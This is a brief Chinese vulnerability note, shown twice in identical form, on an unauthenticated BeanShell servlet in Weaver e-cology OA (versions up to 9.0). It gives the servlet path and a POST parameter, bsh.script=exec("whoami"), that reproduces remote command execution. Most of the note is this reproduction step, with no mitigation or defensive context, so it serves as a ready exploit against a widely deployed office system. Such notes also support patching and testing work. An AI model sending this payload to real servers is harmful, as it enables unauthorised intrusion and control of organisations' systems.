漏洞描述
泛微e-cology OA存在java Beanshell接口,可未授权访问,构造特定数据绕过自带安全限制进行命令执行
影响范围
泛微e-cology<=9.0
漏洞复现
漏洞路径:
/weaver/bsh.servlet.BshServlet
POST:
bsh.script=exec("whoami")
漏洞描述
泛微e-cology OA存在java Beanshell接口,可未授权访问,构造特定数据绕过自带安全限制进行命令执行
影响范围
泛微e-cology<=9.0
漏洞复现
漏洞路径:
/weaver/bsh.servlet.BshServlet
POST:
bsh.script=exec("whoami")